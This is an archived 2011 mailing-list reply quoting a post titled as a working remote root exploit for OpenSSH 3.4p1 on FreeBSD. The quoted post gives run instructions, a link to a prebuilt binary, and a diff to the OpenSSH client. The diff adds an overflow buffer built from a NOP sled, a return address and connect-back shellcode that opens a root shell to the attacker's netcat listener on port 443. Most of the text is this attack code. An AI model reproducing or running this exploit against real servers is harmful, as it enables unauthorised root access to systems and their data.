Re: [Full-disclosure] Working Remote Root Exploit for OpenSSH 3.4p1 (FreeBSD)

From: HI-TECH . <isowarez.isowarez.isowarez@googlemail.com>
To: Benji <me@b3nji.com>
Cc: full-disclosure@lists.grok.org.uk,bugtraq@securityfocus.com
Subject: Re: [Full-disclosure] Working Remote Root Exploit for OpenSSH 3.4p1 (FreeBSD)
Date:


you can apply the patch using the diff if you don't want to run that.

2011/7/1 Benji <me@b3nji.com>:
> So you want people to download your statically linked binary?
>
> On Fri, Jul 1, 2011 at 4:45 PM, HI-TECH .
> <isowarez.isowarez.isowarez@googlemail.com> wrote:
>>
>> OpenSSH FreeBSD Remote Root Exploit
>> By Kingcope
>> Year 2011
>>
>> Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702
>> Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924
>> run like ./ssh -1 -z <yourip> <target>
>> setup a netcat, port 443 on yourip first
>>
>> a statically linked linux binary of the exploit can be found below
>> attached is a diff to openssh-5.8p2.
>>
>> the statically linked binary can be downloaded from
>> http://isowarez.de/ssh_0day
>>
>> I know these versions are really old, some seem to run
>> that tough.
>>
>> -Cheers, King "the archaeologist" Cope
>>
>> diff openssh-5.8p2/ssh.c openssh-5.8p2_2/ssh.c
>> 149a150
>> > char *myip;
>> 195a197,203
>> > "OpenSSH FreeBSD Remote Root Exploit\n"
>> > "By Kingcope\n"
>> > "Year 2011\n\n"
>> > "Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n"
>> > "Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n"
>> > "run like ./ssh -1 -z <yourip> <target>\n"
>> > "setup a netcat, port 443 on yourip first\n\n"
>> 299c307
>> <    while ((opt = getopt(ac, av, "1246ab:c:e:fgi:kl:m:no:p:qstvx"
>> ---
>> >    while ((opt = getopt(ac, av, "1246ab:c:e:fgi:kl:m:no:z:p:qstvx"
>> 335a344,346
>> >            break;
>> >        case 'z':
>> >            myip = optarg;
>> diff openssh-5.8p2/sshconnect1.c openssh-5.8p2_2/sshconnect1.c
>> 667a668,719
>> > //IP=\xc0\xa8\x20\x80
>> > #define    IPADDR "\xc0\xa8\x20\x80"
>> > #define PORT "\x27\x10"       /* htons(10000) */
>> >
>> > char sc[] =
>> >  "\x90\x90"
>> >  "\x90\x90"
>> >  "\x31\xc9"         // xor  ecx, ecx
>> >  "\xf7\xe1"         // mul  ecx
>> >  "\x51"           // push  ecx
>> >  "\x41"           // inc  ecx
>> >  "\x51"           // push  ecx
>> >  "\x41"           // inc  ecx
>> >  "\x51"           // push  ecx
>> >  "\x51"           // push  ecx
>> >  "\xb0\x61"         // mov  al, 97
>> >  "\xcd\x80"         // int  80h
>> >  "\x89\xc3"         // mov  ebx, eax
>> >  "\x68"IPADDR            // push  dword 0101017fh
>> >  "\x66\x68"PORT       // push  word 4135
>> >  "\x66\x51"         // push  cx
>> >  "\x89\xe6"         // mov  esi, esp
>> >  "\xb2\x10"         // mov  dl, 16
>> >  "\x52"           // push  edx
>> >  "\x56"           // push  esi
>> >  "\x50"           // push  eax
>> >  "\x50"           // push  eax
>> >  "\xb0\x62"         // mov  al, 98
>> >  "\xcd\x80"         // int  80h
>> >  "\x41"           // inc  ecx
>> >  "\xb0\x5a"         // mov  al, 90
>> >  "\x49"           // dec  ecx
>> >  "\x51"           // push  ecx
>> >  "\x53"           // push  ebx
>> >  "\x53"           // push  ebx
>> >  "\xcd\x80"         // int  80h
>> >  "\x41"           // inc  ecx
>> >  "\xe2\xf5"         // loop  -10
>> >  "\x51"           // push  ecx
>> >  "\x68\x2f\x2f\x73\x68"   // push  dword 68732f2fh
>> >  "\x68\x2f\x62\x69\x6e"   // push  dword 6e69622fh
>> >  "\x89\xe3"         // mov  ebx, esp
>> >  "\x51"           // push  ecx
>> >  "\x54"           // push  esp
>> >  "\x53"           // push  ebx
>> >  "\x53"           // push  ebx
>> >  "\xb0\xc4\x34\xff"
>> >  "\xcd\x80";        // int  80h
>> >
>> >
>> > extern char *myip;
>> >
>> 678a731,748
>> >
>> >    char buffer[100000];
>> >
>> >    printf("OpenSSH Remote Root Exploit\n");
>> >    printf("By Kingcope\n");
>> >    printf("Year 2011\n\n");
>> >    printf("Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n");
>> >    printf("Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n");
>> >    printf("Connect back to: %s:443\n", myip);
>> >
>> >    *((unsigned long*)(sc + 21)) = inet_addr(myip);
>> >    *((unsigned short*)(sc + 27)) = htons(443);
>> >
>> >    memset(buffer, 'V', 8096);
>> >    memcpy(buffer+24, "\x6b\x4b\x0c\x08", 4); //
>> > SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702
>> >    memset(buffer+28, '\x90', 65535);
>> >    memcpy(buffer+28+65535, sc, sizeof(sc));
>> >    server_user=buffer;
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>





Copyright © 1995-2020 LinuxRocket.net. All rights reserved.